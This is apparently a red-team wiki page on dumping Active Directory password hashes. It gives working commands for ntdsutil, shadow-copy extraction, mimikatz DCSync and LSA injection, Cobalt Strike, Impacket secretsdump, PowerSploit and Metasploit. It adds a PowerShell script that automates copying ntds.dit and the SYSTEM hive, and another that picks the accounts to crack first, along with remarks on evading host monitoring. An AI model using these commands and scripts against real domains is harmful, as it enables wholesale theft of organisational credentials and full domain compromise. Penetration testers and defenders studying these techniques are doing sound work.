Dumping Domain Hashes - CraigDonkin/Infrastructure GitHub Wiki
- Domain credentials live on disk in the Active Directory database (ntds.dit) as NT hashes (NTLM)
- Older Windows versions / functional levels may also store the much weaker LM hash next to the NT hash
- C:\Windows\NTDS\ntds.dit (the database itself; held open by LSASS, so it cannot be copied directly from a live DC)
- C:\Windows\System32\config\SYSTEM (the SYSTEM hive holds the boot key that decrypts the hashes, so always take it together with ntds.dit)
- Microsoft built-in tool (ntdsutil), available on every DC
- Automatically finds the files and takes a volume shadow copy for you
C:\> ntdsutil
activate instance ntds
ifm
create full c:\audit
quit
quit
- Creates a folder C:\audit containing ntds.dit (under Active Directory\) and the SYSTEM and SECURITY hives (under registry\)
- Create a volume shadow copy manually (the locked file can only be copied out of a snapshot)
vssadmin create shadow /for=C:
- Extract ntds.dit from the VSC (use the shadow copy device name vssadmin printed; it is only HarddiskVolumeShadowCopy1 if no other snapshots exist)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\audit\ntds.dit
- Copy the SYSTEM hive, either from the live registry:
REG SAVE HKLM\SYSTEM C:\audit\SYSTEM
- or from the same snapshot:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\audit\SYSTEM
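The vssadmin/copy steps above as one script, added here as an example (it is not code from this wiki or from any of the tools it lists). It snapshots the system volume through the Win32_ShadowCopy CIM class instead of parsing vssadmin output, reads the real HarddiskVolumeShadowCopyN device path from WMI rather than guessing the N, copies ntds.dit and SYSTEM out, deletes the snapshot whether or not the copy worked, and checks that the copied file really is an ESE database. The file locations and the C:\audit output directory are assumptions and are parameters; run it elevated on the DC.

```powershell
# Added example (not from the wiki): script the vssadmin + copy procedure.
# Assumptions: default DIT/hive locations below and an output directory of our
# choosing. Must run elevated on the domain controller.
[CmdletBinding()]
param(
    [string]$Volume = 'C:\',
    [string]$OutDir = 'C:\audit'
)

$ErrorActionPreference = 'Stop'

# Both files are needed offline: the SYSTEM hive holds the boot key that
# decrypts the password encryption key stored inside ntds.dit.
$targets = 'Windows\NTDS\ntds.dit', 'Windows\System32\config\SYSTEM'

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Snapshot the volume (what "vssadmin create shadow /for=C:" does).
$res = Invoke-CimMethod -ClassName Win32_ShadowCopy -MethodName Create `
        -Arguments @{ Volume = $Volume; Context = 'ClientAccessible' }
if ($res.ReturnValue -ne 0) {
    throw "Win32_ShadowCopy.Create failed, return value $($res.ReturnValue)"
}
$shadow = Get-CimInstance -ClassName Win32_ShadowCopy | Where-Object { $_.ID -eq $res.ShadowID }
# DeviceObject is the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path.
$device = $shadow.DeviceObject
Write-Host "Snapshot $($shadow.ID) is $device"

try {
    # 2. Copy the locked files out of the snapshot. cmd.exe's copy accepts the
    #    \\?\GLOBALROOT device path; Copy-Item does not.
    foreach ($rel in $targets) {
        $src = "$device\$rel"
        $dst = Join-Path $OutDir (Split-Path $rel -Leaf)
        & cmd.exe /c "copy /Y `"$src`" `"$dst`"" | Out-Null
        if ($LASTEXITCODE -ne 0 -or -not (Test-Path $dst)) {
            throw "copy of $src failed"
        }
        Write-Host ("{0,-10} {1,14:N0} bytes" -f (Split-Path $rel -Leaf), (Get-Item $dst).Length)
    }
}
finally {
    # 3. Remove the snapshot even if the copy failed; "vssadmin list shadows"
    #    would otherwise show it.
    Remove-CimInstance -InputObject $shadow
}

# 4. A wrong path usually yields a truncated or unrelated file. A real ntds.dit
#    is an ESE database: bytes 4..7 of the header are the signature 0x89ABCDEF,
#    stored little-endian, i.e. EF CD AB 89 on disk.
$ditPath = Join-Path $OutDir 'ntds.dit'
$fs = [System.IO.File]::OpenRead($ditPath)
try {
    $hdr = New-Object byte[] 8
    [void]$fs.Read($hdr, 0, 8)
}
finally { $fs.Dispose() }
$sig = [BitConverter]::ToString($hdr, 4, 4)
if ($sig -ne 'EF-CD-AB-89') {
    throw "$ditPath is not an ESE database (header bytes $sig)"
}
Write-Host "ntds.dit and SYSTEM are in $OutDir; feed them to secretsdump.py in LOCAL mode"
```

The same outcome is available from the IFM route: ntdsutil accepts its subcommands as quoted command-line arguments, so that procedure scripts as a single command as well. Either way the snapshot creation and the reads of ntds.dit are visible to host monitoring (VSS and Sysmon/EDR file events), which is the main reason the DCSync methods below are usually preferred when replication rights are already in hand.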
- Mimikatz DCSync: asks the DC to replicate the secrets over DRSUAPI, so nothing touches the DC's disk. Needs replication rights (Domain Admin, or an account granted Replicating Directory Changes and Replicating Directory Changes All); with Directory Service Access auditing on, each request shows up as a 4662 event on the DC
lsadump::dcsync /domain:blah.blah /all /csv
- Against a specific user:
lsadump::dcsync /domain:blah.blah /user:test
- Run the following on the domain controller itself (pulls the hashes straight out of the running LSASS; needs SeDebugPrivilege, hence privilege::debug first)
privilege::debug
lsadump::lsa /inject
- Cobalt Strike beacon: mimikatz runs in a temporary process that is torn down after each call, so state such as an elevated token does not survive between calls and commands must be chained into one call
mimikatz token::elevate ; lsadump::sam
mimikatz !sekurlsa::logonpasswords
- To elevate the mimikatz process to SYSTEM, prefix the command with `!`, e.g. `mimikatz !lsadump::sam`
- For a DCSync, prefix the command with `@` so mimikatz impersonates the beacon's current token when it talks to the remote DC, e.g. `mimikatz @lsadump::dcsync /domain:blah.blah /user:test`
- Impacket secretsdump with a domain admin user (remote DCSync; the DC's disk is never touched)
secretsdump.py -just-dc-ntlm <domain>/<user>@<domain-controller> -outputfile file
- Drop -just-dc-ntlm to also get the Kerberos keys and, because it is running remotely, the DC's own SAM, LSA secrets and cached credentials; -just-dc keeps it to the NTDS contents (NT hashes plus Kerberos keys)
- Offline mode with the NTDS.dit and SYSTEM hive copied out earlier
secretsdump.py -system SYSTEM -ntds NTDS.dit LOCAL
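Once the dump is on disk the first thing worth checking is what the note at the top of the page warns about: accounts that still have an LM hash stored, plus blank passwords and password reuse between accounts. The script below is an added example (not from this wiki or from Impacket) that parses the `file.ntds` written by `-outputfile` (one `domain\user:rid:lmhash:nthash:::` line per account) and reports those three findings. The sample lines are constructed for the example; only the two well-known "empty password" hash constants are real values.

```powershell
# Added example (not from the wiki): triage a secretsdump .ntds output file.
# Input: lines of the form DOMAIN\user:RID:LMhash:NThash:::  (machine accounts end in $).

$EmptyLM = 'aad3b435b51404eeaad3b435b51404ee'  # LM hash of "" = LM not stored (the safe value)
$EmptyNT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # NT hash of "" = blank password

function ConvertFrom-SecretsDump {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Skip [*] status lines and anything that is not user:rid:lm:nt:::
        if ($line -notmatch '^(?<acct>[^:]+):(?<rid>\d+):(?<lm>[0-9a-f]{32}):(?<nt>[0-9a-f]{32}):::') { continue }
        [pscustomobject]@{
            Account   = $Matches.acct
            RID       = [int]$Matches.rid
            LM        = $Matches.lm.ToLower()
            NT        = $Matches.nt.ToLower()
            IsMachine = $Matches.acct.EndsWith('$')
        }
    }
}

function Get-HashFindings {
    param([object[]]$Entries)
    # Machine account passwords are random 120-char strings; ignore them.
    $users = $Entries | Where-Object { -not $_.IsMachine }
    [pscustomobject]@{
        # Any LM hash other than the empty one means the crackable LM form is stored.
        LmStored  = @($users | Where-Object { $_.LM -ne $EmptyLM } | ForEach-Object Account)
        BlankPass = @($users | Where-Object { $_.NT -eq $EmptyNT } | ForEach-Object Account)
        # Identical NT hash = identical password (no salt), so one crack opens all of them.
        SharedNT  = @($users | Where-Object { $_.NT -ne $EmptyNT } | Group-Object NT |
                      Where-Object Count -gt 1 |
                      ForEach-Object { [pscustomobject]@{ NT = $_.Name; Accounts = @($_.Group.Account) } })
    }
}

# Constructed sample dump (not real data). e52cac... / 8846f7... are the well-known
# LM / NT hashes of "password"; the remaining hashes are made up.
$sample = @'
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
blah.blah\svc_legacy:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
blah.blah\jsmith:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
blah.blah\helpdesk:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Cleaning up...
'@ -split "`r?`n"

$findings = Get-HashFindings (ConvertFrom-SecretsDump $sample)
"LM hash still stored : $($findings.LmStored -join ', ')"
"Blank password       : $($findings.BlankPass -join ', ')"
foreach ($g in $findings.SharedNT) { "Same NT hash $($g.NT) : $($g.Accounts -join ', ')" }
```

To run it against a real dump replace `$sample` with `Get-Content file.ntds`. Accounts in LmStored are the ones to crack first: LM is case-insensitive, split into two 7-character halves and falls to rainbow tables or a short brute force, after which the NT hash of the same account is trivial.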
- PowerSploit VolumeShadowCopyTools (the same VSC approach from PowerShell; Get-VolumeShadowCopy lists the snapshot device paths to copy from)
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/VolumeShadowCopyTools.ps1
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
- Invoke-DCSync (PowerShell wrapper around mimikatz's DCSync; -PWDumpFormat emits user:rid:lm:nt::: lines ready for cracking)
Invoke-DCSync
Invoke-DCSync -PWDumpFormat
- Metasploit: psexec_ntdsgrab takes a VSC on the DC over psexec and pulls ntds.dit and SYSTEM back; domain_hashdump does the same from an existing session
auxiliary/admin/smb/psexec_ntdsgrab
post/windows/gather/credentials/domain_hashdump
- From inside meterpreter (note: hashdump reads the local SAM, not ntds.dit, so on a DC it does not return the domain accounts; use domain_hashdump for those)
hashdump